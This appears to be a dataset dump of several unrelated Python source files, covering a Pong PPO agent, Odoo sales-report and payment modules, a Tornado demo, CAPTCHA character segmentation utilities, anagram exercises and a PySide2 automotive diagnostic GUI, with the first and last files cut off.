self.envs.step([1] * n)\n\n # perform nrand random steps\n for _ in range(nrand):\n fr1, re1, _, _ = self.envs.step(np.random.choice([pong_utils.RIGHT, pong_utils.LEFT], n))\n fr2, re2, _, _ = self.envs.step([0] * n)\n\n for t in range(tmax):\n\n # prepare the input\n # preprocess_batch properly converts two frames into\n # shape (n, 2, 80, 80), the proper input for the policy\n # this is required when building CNN with pytorch\n batch_input = pong_utils.preprocess_batch([fr1, fr2])\n\n # probs will only be used as the pi_old\n # no gradient propagation is needed\n # so we move it to the cpu\n probs = self.policy(batch_input).squeeze().cpu().detach().numpy()\n\n action = np.where(np.random.rand(n) < probs, pong_utils.RIGHT, pong_utils.LEFT)\n probs = np.where(action == pong_utils.RIGHT, probs, 1.0 - probs)\n\n # advance the game (0=no action)\n # we take one action and skip game forward\n fr1, re1, is_done, _ = self.envs.step(action)\n fr2, re2, is_done, _ = self.envs.step([0] * n)\n\n reward = re1 + re2\n\n # store the result\n state_list.append(batch_input)\n reward_list.append(reward)\n prob_list.append(probs)\n action_list.append(action)\n\n # stop if any of the trajectories is done\n # we want all the lists to be retangular\n if is_done.any():\n break\n\n # return pi_theta, states, actions, rewards, probability\n return prob_list, state_list, \\\n action_list, reward_list\n\nclass Policy(nn.Module):\n def __init__(self):\n super(Policy, self).__init__()\n # 80x80x2 to 38x38x4\n # 2 channel from the stacked frame\n self.conv1 = nn.Conv2d(2, 4, kernel_size=6, stride=2, bias=False)\n # 38x38x4 to 9x9x32\n self.conv2 = nn.Conv2d(4, 16, kernel_size=6, stride=4)\n self.size = 9 * 9 * 16\n\n # two fully connected layer\n self.fc1 = nn.Linear(self.size, 256)\n self.fc2 = nn.Linear(256, 1)\n\n # Sigmoid to\n self.sig = nn.Sigmoid()\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = x.view(-1, self.size)\n x = F.relu(self.fc1(x))\n return self.sig(self.fc2(x))\n\nif __name__ == '__main__':\n envs = parallelEnv('PongDeterministic-v4', n=8, seed=1234)\n agent = PPO(envs=envs)\n agent.train()\n","sub_path":"Pong-PPO/ppo_single_output.py","file_name":"ppo_single_output.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"193815115","text":"# -*- encoding: utf-8 -*-\n\nimport base64\n\nfrom odoo import api, fields, models\nfrom odoo.addons.web.controllers.main import ExcelExport\n\n\nclass PrintDetailSaleAnalysis(models.TransientModel):\n _name = 'print.detail.sale.analysis'\n _description = 'Print Detail Sale Analysis'\n\n start_date = fields.Date(string='Start Date', required=True)\n end_date = fields.Date(string='End Date', required=True)\n order_type_ids = fields.Many2many('sale.order.type', string='Order Type', required=True)\n\n @api.multi\n def action_print(self):\n DetailSaleReport = self.env['sale.report.extend']\n DetailSaleReport.init()\n\n domain = [\n ('date', '>=', self.start_date), ('date', '<=', self.end_date),\n ('order_type', 'in', self.order_type_ids.ids)\n ]\n records = DetailSaleReport.search(domain, order=\"date desc, name\")\n value_list = []\n field_list = [\n 'Company', 'Product Category', 'Sub Category', 'Branch Name', 'Area', 'SO Number', 'SO Date',\n 'Customer Name', 'Product Name', 'Ordered Qty', 'Delivered Qty', 'Pending Qty', 'Untaxed',\n 'Total', 'Salesperson', 'Sales Team', 'Order Type'\n ]\n for record in records:\n partner_name = record.title.name + ' ' + record.partner_id.name.strip() if record.title.name else record.partner_id.name.strip()\n value_list.append([\n record.company_id.name or '', record.categ_id.name or '', record.product_sub_category_id.name or '', record.branch_id.name or '',\n record.area_id.name or '', record.name or '', record.date or '', partner_name,\n record.product_id.name.strip(), record.product_uom_qty, record.qty_delivered, record.qty_pending,\n record.price_subtotal, record.price_total, record.user_id.name or '', record.team_id.name or '',\n record.order_type.name or ''\n ])\n\n obj = ExcelExport()\n data = obj.from_data(field_list, value_list)\n\n values = {\n 'name': \"Pending Order Report\",\n 'datas_fname': 'pending_order.xls',\n 'res_model': 'ir.ui.view',\n 'res_id': False,\n 'type': 'binary',\n 'public': True,\n 'datas': base64.b64encode(data),\n }\n\n # Using your data create as attachment\n attachment_id = self.env['ir.attachment'].sudo().create(values)\n\n #Prepare your download URL\n download_url = '/web/content/' + str(attachment_id.id) + '?download=True'\n base_url = self.env['ir.config_parameter'].sudo().get_param('web.base.url')\n\n # Return so it will download in your system\n return {\n \"type\": \"ir.actions.act_url\",\n \"url\": str(base_url) + str(download_url),\n \"target\": \"new\",\n }\n","sub_path":"analysis_detailed_sale/wizard/print_detail_sale_analysis.py","file_name":"print_detail_sale_analysis.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"375009455","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n# @Time : 2020/05/03 18:03\n# @Email : lukeqinlu@yeah.net\n# @Author : Luke\n# @File : example02.py\n# @notice :\n\n\nimport os\nimport re\n\n\nimport tornado.ioloop\nimport tornado.web\nimport platform\n\nfrom tornado.options import define, options, parse_command_line\n\n\ndefine('port', default=8000, type=int)\n\nusers = {}\n\n\nclass User(object):\n \"\"\"用户\"\"\"\n\n def __init__(self, nickname, gender, birthday):\n self.nickname = nickname\n self.gender = gender\n self.birthday = birthday\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n nickname = self.get_cookie('nickname')\n if nickname in users:\n self.render('userinfo.html', user=users[nickname])\n else:\n self.render('userform.html', hint='请填写个人信息')\n\n\nclass UserHandler(tornado.web.RequestHandler):\n def post(self):\n nickname = self.get_body_argument('nickname').strip()\n gender = self.get_body_argument('gender')\n birthday = self.get_body_argument('birthday')\n\n if not re.fullmatch(r'\\w{6,20}', nickname):\n self.render('userform.html', hint='请输入有效的昵称')\n elif nickname in users:\n self.render('userform.html', hint='昵称已经被使用过')\n else:\n users[nickname] = User(nickname, gender, birthday)\n self.set_cookie('nickname', nickname, expires_days=7)\n self.render('userinfo.html', user=users[nickname])\n\n\ndef main():\n if platform.system() == \"Windows\":\n import asyncio\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n parse_command_line()\n app = tornado.web.Application(\n handlers=[(r'/', MainHandler),\n (r'/register', UserHandler)],\n template_path=os.path.join(os.path.dirname(__file__), 'templates'))\n app.listen(options.port)\n tornado.ioloop.IOLoop.current().start()\n\nif __name__ == '__main__':\n main()","sub_path":"python_100_days/day61_65/tornado/example02.py","file_name":"example02.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"63725000","text":"\"\"\"Test module\"\"\"\n\ndef print_float(nbr):\n \"\"\"Print floating point number shorten at third decimal\n and replace '.' by ','.\"\"\"\n if type(nbr) is not float:\n raise TypeError(\"Type float expected.\")\n nbr = str(nbr)\n nbr = nbr.split('.')\n print(nbr[0] + ',' + nbr[1][:3])\n\ndef is_bisextile(year):\n year = input(\"Choose a year : \")\n year = int(year)\n if not year % 4:\n if not year % 100:\n if not year % 400:\n print(\"bissexile\")\n else:\n print(\"not bissexile\")\n else:\n print(\"bissexile\")\n else:\n print(\"not bissexile\")\n\ndef my_print(*values, sep=' ', end='\\n'):\n string = ''\n for elem in values:\n string = string + str(sep) + str(elem)\n string += str(end)\n string = string[1:]\n print(string, end='', sep='')\n\ninventaire = [\n (\"pommes\", 22),\n (\"melons\", 4),\n (\"poires\", 18),\n (\"fraises\", 76),\n (\"prunes\", 51),\n]\n","sub_path":"openclassroom_python/test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"210316014","text":"import pyb\r\nimport syncpri\r\nimport _thread\r\n\r\n\r\n# callback is a func that accept only a param\r\ndef map_to_thread(callback, *args):\r\n\tdef func(f):\r\n\t\tdef wrapper():\r\n\t\t\tf(*args)\r\n\t\treturn Mapper(callback, wrapper, nargs=1, forward_args=False)\r\n\treturn func\r\n\r\n\r\nclass Mapper(object):\r\n\t__default_event = syncpri.Event(mutex=syncpri.SpinMutex(restrict_owner=False))\r\n\t__internal_thread_running = False\r\n\t__mappers = []\r\n\r\n\t@classmethod\r\n\tdef __internal_thread(cls):\r\n\t\twhile True:\r\n\t\t\tsyncpri.Event.wait_any(map(lambda m: m.__event, cls.__mappers))\r\n\t\t\tfor mapper in cls.__mappers:\r\n\t\t\t\tif mapper.__raised:\r\n\t\t\t\t\tmapper.__raised = False\r\n\t\t\t\t\tif mapper.__disposed:\r\n\t\t\t\t\t\tcls.__mappers.remove(mapper)\r\n\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\t\tif mapper.__forward_args:\r\n\t\t\t\t\t\tmapper.__func(*mapper.__args, **mapper.__kw)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tmapper.__func()\r\n\t\t\tpyb.delay(1) # the magic code :)\r\n\r\n\tdef __init__(self, caller, func, *, interrpt_func=None, nargs=None, event=None, forward_args=True):\r\n\t\tif event is None:\r\n\t\t\tevent = type(self).__default_event\r\n\t\tself.__event = event\r\n\t\tself.__caller = caller\r\n\t\tself.__disposed = False\r\n\t\tself.__raised = False\r\n\t\tself.__func = func\r\n\t\tself.__forward_args = forward_args\r\n\t\twrapper = None\r\n\r\n\t\tif nargs is None:\r\n\t\t\tdef var_param_func(*args, **kw):\r\n\t\t\t\tif interrpt_func is not None:\r\n\t\t\t\t\tinterrpt_func()\r\n\t\t\t\tself.__args = args\r\n\t\t\t\tself.__kw = kw\r\n\t\t\t\tself.__raise_event()\r\n\t\t\twrapper = var_param_func\r\n\t\telif nargs == 1:\r\n\t\t\t# when entering interrupt mode, you cannot create the mp object\r\n\t\t\t# required by *args, so we must provide special support for that\r\n\t\t\tself.__kw = {}\r\n\t\t\tself.__args = [None]\r\n\r\n\t\t\tdef one_param_func(arg):\r\n\t\t\t\tif interrpt_func is not None:\r\n\t\t\t\t\tinterrpt_func()\r\n\t\t\t\tif forward_args:\r\n\t\t\t\t\tself.__args[0] = arg\r\n\t\t\t\tself.__raise_event()\r\n\t\t\twrapper = one_param_func\r\n\r\n\t\tcaller(wrapper)\r\n\t\ttype(self).__mappers.append(self)\r\n\t\t# if not type(self).__internal_thread_running:\r\n\t\t#\ttype(self).__internal_thread_running = True\r\n\t\t#\t_thread.start_new_thread(type(self).__internal_thread, [])\r\n\r\n\t@classmethod\r\n\tdef run(cls, *, use_main_thread=False):\r\n\t\tif use_main_thread:\r\n\t\t\tcls.__internal_thread()\r\n\t\telse:\r\n\t\t\tif not cls.__internal_thread_running:\r\n\t\t\t\tcls.__internal_thread_running = True\r\n\t\t\t\t_thread.start_new_thread(cls.__internal_thread, [])\r\n\r\n\tdef __raise_event(self):\r\n\t\tself.__raised = True\r\n\t\tself.__event.set()\r\n\r\n\tdef dispose(self):\r\n\t\tself.__disposed = True\r\n\t\tself.__caller(None)\r\n\t\tself.__raise_event() # wakeup the thread and commit suicide\r\n","sub_path":"cmemgr.py","file_name":"cmemgr.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"185226054","text":"# -*- coding: UTF-8 -*-\n\nimport imutils\nimport cv2\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef resize_to_fit(image, width, height):\n \"\"\"\n A helper function to resize an image to fit within a given size\n :param image: image to resize\n :param width: desired width in pixels\n :param height: desired height in pixels\n :return: the resized image\n \"\"\"\n (h, w) = image.shape[:2]\n if w > h:\n image = imutils.resize(image, width=width)\n\n else:\n image = imutils.resize(image, height=height)\n\n padW = int((width - image.shape[1]) / 2.0)\n padH = int((height - image.shape[0]) / 2.0)\n\n image = cv2.copyMakeBorder(image, padH, padH, padW, padW,\n cv2.BORDER_REPLICATE)\n image = cv2.resize(image, (width, height))\n\n return image\n\n## 获取图片各个验证码的轮廓\ndef findContours(gray):\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n contours = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if imutils.is_cv2() else contours[1]\n return contours\n\n## 获取图片各个验证码的位置\ndef findRegions(contours):\n regions = []\n for contour in contours:\n (x, y, w, h) = cv2.boundingRect(contour)\n if w / h > 1.25:\n half_width = int(w / 2)\n regions.append((x, y, half_width, h))\n regions.append((x + half_width, y, half_width, h))\n else:\n regions.append((x, y, w, h))\n regions = sorted(regions, key=lambda x: x[0])\n return regions\n\n## 保存切割图片\ndef saveCutImg(gray, counts, saveDir, regions, text):\n for region, code in zip(regions, text):\n x, y, w, h = region\n image = gray[y - 2:y + h + 2, x - 2:x + w + 2]\n save_path = os.path.join(saveDir, code)\n \n if not os.path.exists(save_path):\n os.makedirs(save_path)\n \n count = counts.get(code, 0)\n p = os.path.join(save_path, \"{}.png\".format(str(count).zfill(6)))\n cv2.imwrite(p, image)\n \n counts[code] = counts.get(code, 0) + 1\n return counts\n\n\ndef readTextByStr(txtPath):\n lines = open(txtPath,\"r\", encoding='utf8').readlines() \n ls = \"\"\n for line in lines: \n ls += line.strip('\\n')\n return ls\n\ndef readText(txtPath):\n lines = open(txtPath,\"r\").readlines() \n ls = []\n for line in lines: \n ls.append(line.strip('\\n')) \n return ls\n\ndef readWrite(path, content):\n fo = open(path, \"w\")\n fo.writelines(content)\n fo.close()\n \ndef getLetter(model, img, name_list, IMAGE_SIZE):\n img = cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n img = img.reshape((1, 1, IMAGE_SIZE, IMAGE_SIZE))\n img = img.astype('float32')\n img = img/255.0\n \n result = model.predict_proba(img)\n max_index = np.argmax(result)\n \n picType,prob = max_index,result[0][max_index]\n \n if picType != -1:\n return name_list[picType],prob\n else:\n return \"\"\n \n \ndef extract_peek_ranges_from_array(array_vals, minimun_val=10, minimun_range=2):\n start_i = None\n end_i = None\n peek_ranges = []\n for i, val in enumerate(array_vals):\n if val > minimun_val and start_i is None:\n start_i = i\n elif val > minimun_val and start_i is not None:\n pass\n elif val < minimun_val and start_i is not None:\n end_i = i\n if end_i - start_i >= minimun_range:\n peek_ranges.append((start_i, end_i))\n start_i = None\n end_i = None\n elif val < minimun_val and start_i is None:\n pass\n else:\n raise ValueError(\"cannot parse this case...\")\n return peek_ranges\n\ndef median_split_ranges(peek_ranges):\n new_peek_ranges = []\n widthes = []\n for peek_range in peek_ranges:\n w = peek_range[1] - peek_range[0] + 1\n widthes.append(w)\n widthes = np.asarray(widthes)\n median_w = np.median(widthes)\n for i, peek_range in enumerate(peek_ranges):\n num_char = int(round(widthes[i]/median_w, 0))\n if num_char > 1:\n char_w = float(widthes[i] / num_char)\n for i in range(num_char):\n start_point = peek_range[0] + int(i * char_w)\n end_point = peek_range[0] + int((i + 1) * char_w)\n new_peek_ranges.append((start_point, end_point))\n else:\n new_peek_ranges.append(peek_range)\n return new_peek_ranges\n\ndef get_font_face_peek_ranges(path_test_image):\n image_color = cv2.imread(path_test_image)\n new_shape = (image_color.shape[1] * 2, image_color.shape[0] * 2)\n image_color = cv2.resize(image_color, new_shape)\n image = cv2.cvtColor(image_color, cv2.COLOR_BGR2GRAY)\n \n adaptive_threshold = cv2.adaptiveThreshold(\n image,\n 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv2.THRESH_BINARY_INV, 11, 2)\n \n horizontal_sum = np.sum(adaptive_threshold, axis=1)\n \n# plt.plot(horizontal_sum, range(horizontal_sum.shape[0]))\n# plt.gca().invert_yaxis()\n # plt.show()\n \n peek_ranges = extract_peek_ranges_from_array(horizontal_sum)\n \n vertical_peek_ranges2d = []\n for peek_range in peek_ranges:\n start_y = peek_range[0]\n end_y = peek_range[1]\n line_img = adaptive_threshold[start_y:end_y, :]\n vertical_sum = np.sum(line_img, axis=0)\n vertical_peek_ranges = extract_peek_ranges_from_array(\n vertical_sum,\n minimun_val=40,\n minimun_range=1)\n vertical_peek_ranges2d.append(vertical_peek_ranges)\n \n vertical_peek_ranges2d = []\n for peek_range in peek_ranges:\n start_y = peek_range[0]\n end_y = peek_range[1]\n line_img = adaptive_threshold[start_y:end_y, :]\n vertical_sum = np.sum(line_img, axis=0)\n vertical_peek_ranges = extract_peek_ranges_from_array(\n vertical_sum,\n minimun_val=40,\n minimun_range=1)\n vertical_peek_ranges = median_split_ranges(vertical_peek_ranges)\n vertical_peek_ranges2d.append(vertical_peek_ranges)\n return peek_ranges,vertical_peek_ranges2d,image_color\n","sub_path":"demo/font/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"337513668","text":"#!/usr/bin/env python3\n\nfrom collections import Counter\n\n# The official documentation shows that == does indeed compare dictionaries by value, not by address. \\\n#\n# docs.python.org/2/library/stdtypes.html#mapping-types-dict\n\n\ndef are_anagrams_simple_with_counter(string_one, string_two):\n\n return Counter(string_one) == Counter(string_two)\n\n # if Counter(string_one) == Counter(string_two):\n # return True\n # else:\n # return False\n\ndef are_anagrams_simple_with_sorted(string_one, string_two):\n\n return sorted(string_one) == sorted(string_two)\n\n\ndef are_anagrams_with_bit_manipulation(str1, str2):\n\n # If two strings have different size\n if (len(str1) != len(str2)):\n return False;\n\n # To store the xor value\n value = 0;\n\n for i in range(0, len(str1)):\n value = value ^ ord(str1[i]);\n value = value ^ ord(str2[i]);\n\n return value == 0;\n\n\ndef are_anagrams(string_one, string_two):\n\n characters_found = {}\n characters_found2 = {}\n\n for char in string_one:\n try:\n characters_found[char] += 1\n except KeyError:\n characters_found[char] = 1\n print(\"Char: \" + char)\n\n for char2 in string_two:\n try:\n characters_found2[char2] += 1\n except KeyError:\n characters_found2[char2] = 1\n\n if characters_found == characters_found2:\n return True\n else:\n return False\n\n\ndef main():\n print(\"Equal with dict? \" + str(are_anagrams(\"cinema\", \"iceman\")))\n\n print(\"Equal for counter? {}\".format(are_anagrams_simple_with_counter(\"cinema\", \"iceman\")))\n\n print(\"Equal for sorted? {}\".format(are_anagrams_simple_with_sorted(\"cinema\", \"iceman\")))\n\n print(\"Equal for bit manipulation? {}\".format(are_anagrams_with_bit_manipulation(\"cinema\", \"iceman\")))\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"PythonPractice/amazon_questions/is_anagram.py","file_name":"is_anagram.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"61613298","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError, ValidationError\nimport base64\nimport io\nimport os\nimport logging\nfrom jinja2 import Environment, FileSystemLoader\nfrom collections import defaultdict\nfrom odoo.addons.account.models.account_payment import account_payment as account_payment_orig\n\nMAP_INVOICE_TYPE_PARTNER_TYPE = {\n 'out_invoice': 'customer',\n 'out_refund': 'customer',\n 'out_receipt': 'customer',\n 'in_invoice': 'supplier',\n 'in_refund': 'supplier',\n 'in_receipt': 'supplier',\n 'liq_purchase': 'supplier',\n 'sale_note': 'customer',\n 'in_debit': 'supplier',\n 'out_debit': 'customer',\n}\n\ntype_account = {\n 'savings': 'AHO',\n 'checking': 'CTE',\n}\n\ntype_ident = {\n 'cedula': 'C',\n 'ruc': 'R',\n 'pasaporte':'P',\n}\n\n \n\nclass account_payment(models.Model):\n _name = \"account.payment\"\n _inherit = \"account.payment\"\n _description = \"Payments\"\n _order = \"payment_date desc, name desc\"\n\n communication = fields.Char(string='Memo', required=True)\n report_bank = fields.Binary(string='Archivo Bancario', readonly=True)\n report_bank_name = fields.Char(string='Nombre Archivo Bancario', store=True)\n account_debit_id = fields.Many2one('account.account', string=\"Cuenta de Debito\")\n sequence_report = fields.Integer('N. Comprobante')\n\n def report_disbursement(self):\n move_ids = []\n invoice_ids = []\n payment_ids = self.env['account.payment'].browse(self._ids)\n sequence_id = self.env['ir.sequence']\n payment_method_id = ''\n partner_id = ''\n check_number = ''\n payment_date = ''\n payment_type = ''\n partner_type = ''\n communication = ''\n journal = ''\n currency_id = ''\n amount = 0\n sequence = ''\n for payment in payment_ids:\n if payment.sequence_report:\n sequence = payment.sequence_report\n amount += payment.amount\n if payment.check_number:\n check_number += str(payment.check_number) + '/ '\n if not partner_id:\n partner_id = payment.partner_id.name\n payment_method_id = {'code':payment.payment_method_id.code,'name':payment.payment_method_id.name}\n payment_date = payment.payment_date\n payment_type = payment.payment_type\n partner_type = payment.partner_type\n communication = payment.communication\n journal = payment.journal_id.name\n currency_id = payment.currency_id\n if payment.payment_method_id.code != payment_method_id['code'] or partner_id != payment.partner_id.name:\n raise ValidationError(_('Debe seleccionar pagos con el mismo método de pago, cliente o proveedor'))\n for invoice in payment.reconciled_invoice_ids:\n invoice_ids.append({\n 'invoice_date':invoice.invoice_date,\n 'number':invoice.invoice_number,\n 'amount_total': invoice.amount_total,\n 'payment': payment._get_invoice_payment_amount(invoice),\n 'residual': invoice.amount_residual,\n })\n for move in payment.move_line_ids:\n move_ids.append({\n 'account_id':move.account_id,\n 'name': move.name,\n 'debit': move.debit,\n 'credit': move.credit,\n })\n if payment_type == 'outbound' and not sequence:\n sequence = sequence_id.next_by_code('comprobante_egreso')\n elif payment_type == 'inbound' and not sequence:\n sequence = sequence_id.next_by_code('comprobante_ingreso')\n payment_ids.write({'sequence_report': sequence})\n data = {\n 'payment_date': payment_date,\n 'partner_type': partner_type,\n 'amount': amount,\n 'communication': communication,\n 'journal_id': journal,\n 'reconciled_invoice_ids': invoice_ids,\n 'move_line_ids': move_ids,\n 'partner_id': partner_id,\n 'check_number': check_number,\n 'payment_method_id': payment_method_id,\n 'payment_type': payment_type,\n 'currency_id':currency_id,\n 'sequence':sequence,\n }\n return data\n\n def report_bank_transfer(self):\n bank_id = self.env['res.partner.bank'].search([('partner_id','=',self.partner_id.id)],order=\"id desc\", limit=1)\n if not bank_id:\n raise ValidationError(_(\"%s no tiene registrada una cuenta bancaria.\" % (self.partner_id.name)))\n dtc = []\n data = {'employees':''}\n dtc.append({\n 'identifier':self.partner_id.identifier,\n 'amount':'%.2f'%(self.amount),\n 'type_account':type_account[bank_id.account_type],\n 'account_number':bank_id.acc_number,\n 'reference': self.communication or 'PAGO',\n 'phone':self.partner_id.phone or self.partner_id.mobile,\n 'month':self.payment_date.month,\n 'year':self.payment_date.year,\n 'type_identifier':type_ident[self.partner_id.type_identifier],\n 'name':self.partner_id.name,\n 'code':bank_id.bank_id.bic,\n })\n if not dtc:\n raise ValidationError(_(\"Ninguno de los empleados tiene asignada una cuenta bancaria.\"))\n data = {'employees':dtc}\n if self.journal_id.format_transfer_id:\n tmpl_path = os.path.join(os.path.dirname(__file__), 'template')\n env = Environment(loader=FileSystemLoader(tmpl_path))\n format_report = env.get_template(self.journal_id.format_transfer_id+'.xml')\n report = format_report.render(data)\n buf = io.StringIO()\n buf.write(report)\n out = base64.encodestring(buf.getvalue().encode('utf-8')).decode()\n logging.error(out)\n buf.close()\n self.report_bank = out\n self.report_bank_name = 'Transferencia Bancaria %s.txt' %(self.partner_id.name)\n return out\n else:\n raise ValidationError(_(\"Primero debe configurar un formato de Transferencia Bancaria en el Diario.\"))\n\n @api.model\n def default_get(self, default_fields):\n rec = super(account_payment_orig, self).default_get(default_fields)\n active_ids = self._context.get('active_ids') or self._context.get('active_id')\n active_model = self._context.get('active_model')\n\n # Check for selected invoices ids\n if not active_ids or active_model != 'account.move':\n return rec\n\n invoices = self.env['account.move'].browse(active_ids).filtered(lambda move: move.is_invoice(include_receipts=True))\n\n # Check all invoices are open\n if not invoices or any(invoice.state != 'posted' for invoice in invoices):\n raise UserError(_(\"You can only register payments for open invoices\"))\n # Check if, in batch payments, there are not negative invoices and positive invoices\n dtype = invoices[0].type\n for inv in invoices[1:]:\n if inv.type != dtype:\n if ((dtype == 'in_refund' and inv.type == 'in_invoice') or\n (dtype == 'in_invoice' and inv.type == 'in_refund')):\n raise UserError(_(\"You cannot register payments for vendor bills and supplier refunds at the same time.\"))\n if ((dtype == 'out_refund' and inv.type == 'out_invoice') or\n (dtype == 'out_invoice' and inv.type == 'out_refund')):\n raise UserError(_(\"You cannot register payments for customer invoices and credit notes at the same time.\"))\n\n amount = self._compute_payment_amount(invoices, invoices[0].currency_id, invoices[0].journal_id, rec.get('payment_date') or fields.Date.today())\n rec.update({\n 'currency_id': invoices[0].currency_id.id,\n 'amount': abs(amount),\n 'payment_type': 'inbound' if amount > 0 else 'outbound',\n 'partner_id': invoices[0].commercial_partner_id.id,\n 'partner_type': MAP_INVOICE_TYPE_PARTNER_TYPE[invoices[0].type],\n 'communication': invoices[0].invoice_payment_ref or invoices[0].ref or invoices[0].name,\n 'invoice_ids': [(6, 0, invoices.ids)],\n })\n return rec\n\nclass payment_register(models.TransientModel):\n _name = 'account.payment.register'\n _inherit = 'account.payment.register'\n \n def _prepare_payment_vals(self, invoices):\n '''Create the payment values.\n\n :param invoices: The invoices/bills to pay. In case of multiple\n documents, they need to be grouped by partner, bank, journal and\n currency.\n :return: The payment values as a dictionary.\n '''\n amount = self.env['account.payment']._compute_payment_amount(invoices, invoices[0].currency_id, self.journal_id, self.payment_date)\n values = {\n 'journal_id': self.journal_id.id,\n 'payment_method_id': self.payment_method_id.id,\n 'payment_date': self.payment_date,\n 'communication': \" \".join(i.invoice_payment_ref or i.ref or i.name for i in invoices),\n 'invoice_ids': [(6, 0, invoices.ids)],\n 'payment_type': ('inbound' if amount > 0 else 'outbound'),\n 'amount': abs(amount),\n 'currency_id': invoices[0].currency_id.id,\n 'partner_id': invoices[0].commercial_partner_id.id,\n 'partner_type': MAP_INVOICE_TYPE_PARTNER_TYPE[invoices[0].type],\n 'partner_bank_account_id': invoices[0].invoice_partner_bank_id.id,\n }\n return values\n\n def get_payments_vals(self):\n '''Compute the values for payments.\n\n :return: a list of payment values (dictionary).\n '''\n grouped = defaultdict(lambda: self.env[\"account.move\"])\n for inv in self.invoice_ids:\n if self.group_payment:\n grouped[(inv.commercial_partner_id, inv.currency_id, inv.invoice_partner_bank_id, MAP_INVOICE_TYPE_PARTNER_TYPE[inv.type])] += inv\n else:\n grouped[inv.id] += inv\n return [self._prepare_payment_vals(invoices) for invoices in grouped.values()]\n","sub_path":"l10n_ec/models/account_payment.py","file_name":"account_payment.py","file_ext":"py","file_size_in_byte":10378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"593111952","text":"from gui import Ui_MainWindow\nfrom Ecu_Const import get_all_ecu, DIAG_SID, get_ecu_logical_address_by_index\nfrom uds import Uds\nfrom PySide2.QtCore import Signal,QObject\nfrom PySide2.QtWidgets import QApplication, QMainWindow, QAction, QTextBrowser, QTableWidget, QTableWidgetItem\nfrom PySide2.QtWidgets import QHeaderView\nfrom threading import Thread\nfrom ctypes import *\nimport os\n\nclass Main_Ui(Ui_MainWindow):\n\n def __init__(self, MainWindow):\n\n self.setupUi(MainWindow)\n\n self.__globalSignal = GlobalSigals()\n self.__init_all_components()\n self.__init_all_actions()\n # self.__init_uds_settings()\n\n self.__doip_connection_status = False\n\n\n def __init_uds_settings(self):\n \"\"\"\n\n \"\"\"\n self.__ecu_ip_address = self.ecuIpAddressLineEdit.text()\n self.__ecu_logical_address = int(self.ecuLogicalAddressLineEdit.text(), 16)\n self.__tester_ip_address = self.testerIpAddresslineEdit.text()\n self.__tester_logical_address = int(self.testerLogicalAddressLineEdit.text(),16)\n\n print(self.__ecu_ip_address, self.__ecu_logical_address)\n print(self.__tester_ip_address, self.__tester_logical_address)\n\n\n def __init_all_components(self):\n self.__init_sidSeclectBox()\n self.__init_ecuSeclectBox()\n self.__set_pushbutton_status(False)\n self.__init_all_signals()\n self.__init_multi_diag_msg_tableWidget()\n\n\n def __init_sidSeclectBox(self):\n self.sidSeclectBox.addItems(DIAG_SID)\n\n def __init_ecuSeclectBox(self):\n self.ecuSeclectBox.addItems(get_all_ecu())\n\n def __set_pushbutton_status(self, isEnable):\n self.sendDiagMsgButton.setEnabled(isEnable)\n self.sendDoipUdpMsgButton.setEnabled(isEnable)\n # self.buildConnectionButton.setEnabled(not isEnable)\n\n\n def __init_all_actions(self):\n self.buildConnectionButton.triggered.connect(self.__init_uds_client_action)\n self.sendDiagMsgButton.clicked.connect(self.__send_diagMsg_action)\n self.diagReqMsgLineEdit.returnPressed.connect(self.__send_diagMsg_action)\n\n self.addLinePushButton.clicked.connect(self.__add_Line_PushButton_action)\n self.clearPushButton.clicked.connect(self.__clear_tableWidget_PushButton_action)\n self.multiSendPushButton.clicked.connect(self.__multi_line_send_PushButton_action)\n\n # self.sendDoipUdpMsgButton.clicked.connect()\n # 具体菜单项\n msgClearOption = QAction(self.DiagMsgPrintBrowser)\n msgClearOption.setText(\"清空\")\n msgClearOption.triggered.connect(self.__clear_all_print_textBrowser) # 点击菜单中的“发送控制代码”执行的函数\n\n # tableView 添加具体的右键菜单\n self.DiagMsgPrintBrowser.addAction(msgClearOption)\n\n def __init_all_signals(self):\n self.__globalSignal.msgPrintBrowserSignal.connect(self.append_msg_to_textBrowser)\n\n def __init_multi_diag_msg_tableWidget(self):\n # self.multiLineTableWidget.insertRow(0)\n # qv = QHeaderView(Horizontal)\n # hh = self.multiLineTableWidget.horizontalHeader()\n # vh = self.multiLineTableWidget.verticalHeaderItem(0)\n # vh.setText('11111')\n # print(self.multiLineTableWidget.rowCount())\n #\n # 